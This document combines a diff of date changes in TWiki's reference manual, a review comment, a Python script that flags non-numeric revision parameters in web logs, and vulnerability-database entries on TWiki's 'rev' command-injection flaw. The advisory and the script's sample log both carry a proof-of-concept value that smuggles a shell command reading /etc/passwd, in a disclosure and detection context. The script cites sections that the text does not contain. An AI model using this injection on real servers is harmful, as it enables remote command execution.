+++ TWikiDocumentation.html     2005-09-10 03:09:15.000000000 +0200
@@ -1,7 +1,7 @@
 <html><head>
 <title>TWikiDocumentation</title>
 </head><body bgcolor="#ffffff">
-<h1><a name="TWiki_Reference_Manual_01_Sep_20"> </a><a
name="_TWiki_Reference_Manual_01_Sep_2"> </a>  TWiki Reference Manual
(01 Sep 2004 $Rev: 1742 $) </h1>
+<h1><a name="TWiki_Reference_Manual_03_Sep_20"> </a><a
name="_TWiki_Reference_Manual_03_Sep_2"> </a>  TWiki Reference Manual
(03 Sep 2004 $Rev: 1742 $) </h1>
 <p />
 <script type="text/javascript">
 <!--
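Review bot: besides the visible heading text, the changed `<h1>` line renames the anchors `TWiki_Reference_Manual_01_Sep_20` and `_TWiki_Reference_Manual_01_Sep_2` to their `03_Sep` forms, which breaks any existing link to those fragment identifiers. Keep the old anchor names alongside the new ones, or leave the anchors unchanged and update only the heading text. The removed and added lines are also wrapped across three lines each in this copy, so this hunk will not apply as quoted.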
@@ -3816,7 +3816,7 @@
 </li>
 </ul>
 <p />
-This version of TWiki - 01 Sep 2004 $Rev: 1742 $ - expands the
following variables (enclosed in <code><b>%</b></code> percent signs):
+This version of TWiki - 03 Sep 2004 $Rev: 1742 $ - expands the
following variables (enclosed in <code><b>%</b></code> percent signs):
 <p />
 <p />
 <p />
@@ -4627,7 +4627,7 @@
 <ul>
 <li> Syntax: <code>%WIKIVERSION%</code>
 </li>
-<li> Expands to: <code>01 Sep 2004 $Rev: 1742 $</code>
+<li> Expands to: <code>03 Sep 2004 $Rev: 1742 $</code>
 </li>
 <li> Related: <a class="twikiAnchorLink"
href="#VarPLUGINVERSION">PLUGINVERSION</a>, <a class="twikiAnchorLink"
href="#VarWIKITOOLNAME">WIKITOOLNAME</a>
 </li>
@@ -9836,4 +9836,4 @@
 </li>
 </ul>
 <p />
-</body></html>
\ No newline at end of file
+</body></html>
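
Added example, not part of the advisory or of the TWiki code base: a detection pass over web-server access logs that URL-decodes the rev, rev1 and rev2 query parameters sent to the view, viewfile and rdiff scripts and reports every value that is not a plain revision number. The log lines are constructed samples (line 3 carries the example URL from the Details section above); the combined-log layout and the rev1/rev2 parameter names, taken from the $rev1/$rev2 variables in the rdiff hunks, are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Revision forms the patched code on this page reduces to a number:
# "3", "1.3" or "r1.3". Anything else is reported.
VALID_REV = re.compile(r"r?(?:1\.)?[0-9]+")

# Request field of a common/combined log line (layout is an assumption).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')

# Scripts patched in the advisory and the parameters they read.
# rev1/rev2 are assumed from the $rev1/$rev2 variables in the rdiff hunks.
REV_SCRIPTS = {"view", "viewfile", "rdiff"}
REV_PARAMS = {"rev", "rev1", "rev2"}

# Constructed sample log. Line 3 uses the example URL path from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Sep/2005:10:01:02 +0000] '
    '"GET /cgi-bin/view/Main/TWikiUsers?rev=1.2 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [14/Sep/2005:10:01:09 +0000] '
    '"GET /cgi-bin/view/Main/TWikiUsers?rev=r1.3 HTTP/1.1" 200 5301',
    '198.51.100.7 - - [14/Sep/2005:10:02:30 +0000] '
    '"GET /cgi-bin/view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd HTTP/1.1" 200 4711',
    '192.0.2.44 - - [14/Sep/2005:10:03:00 +0000] '
    '"GET /cgi-bin/rdiff/Main/WebHome?rev1=4;rev2=3 HTTP/1.1" 200 812',
    '192.0.2.44 - - [14/Sep/2005:10:03:05 +0000] '
    '"GET /cgi-bin/rdiff/Main/WebHome?rev1=4&rev2=latest HTTP/1.1" 200 640',
    '192.0.2.44 - - [14/Sep/2005:10:03:10 +0000] '
    '"GET /cgi-bin/view/Main/WebHome?skin=print HTTP/1.1" 200 900',
    '192.0.2.44 - - [14/Sep/2005:10:03:12 +0000] '
    '"GET /images/logo.gif?rev=x HTTP/1.1" 200 77',
]


def suspicious_rev_requests(log_lines):
    """Return (line_no, param, decoded_value) for each non-numeric rev value."""
    findings = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        path, _, query = match.group("target").partition("?")
        # Only requests to the scripts that read a revision parameter.
        if not REV_SCRIPTS.intersection(path.split("/")):
            continue
        # CGI query strings may separate pairs with ';' as well as '&'.
        for name, value in parse_qsl(query.replace(";", "&")):
            # parse_qsl percent-decodes, so %7C is compared as '|'.
            # fullmatch() rejects trailing characters, including a newline,
            # that a '$'-anchored search would let through.
            if name in REV_PARAMS and not VALID_REV.fullmatch(value):
                findings.append((line_no, name, value))
    return findings


if __name__ == "__main__":
    for line_no, name, value in suspicious_rev_requests(SAMPLE_LOG):
        print(f"line {line_no}: {name}={value!r}")
```

Values are decoded once, so a doubly encoded parameter is reported in its once-decoded form; that is still not a valid revision and is flagged.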
    

- Vulnerability information

19403
TWiki rev Parameter Arbitrary Command Injection
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability description

TWiki contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is triggered when specially crafted shell metacharacters are passed to the 'rev' parameter, which does not perform input validation.

- Timeline

2005-09-14 Unknown
2005-09-14 2004-09-14

- Solution

Upgrade to version 04Sep2004 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

TWiki TWikiUsers INCLUDE Function Remote Arbitrary Command Execution Vulnerability
Input Validation Error 14960
Yes No
2005-09-28 12:00:00 2009-07-12 05:06:00
JChristophFuchs <jcf@ipp.mpg.de> and JoseLuna <luna@aditel.org> disclosed this issue to the vendor.

- Affected software versions

TWiki TWiki 20040903
TWiki TWiki 20040902
TWiki TWiki 20040901
TWiki TWiki 20030201
TWiki TWiki 01-Dec-2001

- Vulnerability discussion

A remote command execution vulnerability affects the application.

The revision control function of the TWikiUsers script uses the backtick shell metacharacter to construct a command line. An attacker may use a specially crafted URI to execute arbitrary commands through the shell.

This attack would occur in the context of the vulnerable application and can facilitate unauthorized remote access.

- Exploit

An exploit is not required.

The following proof of concept example is available:
%INCLUDE{ "Main.TWikiUsers" rev="2|less /etc/passwd" }%

- Solution

The vendor has released an advisory to address this issue. Please see the referenced advisory for further information.

A patch addressing this issue has been made available at:
http://twiki.org/cgi-bin/view/Codev/UncoordinatedSecurityAlert23Feb2005


TWiki TWiki 20040902

- Related references

 

 
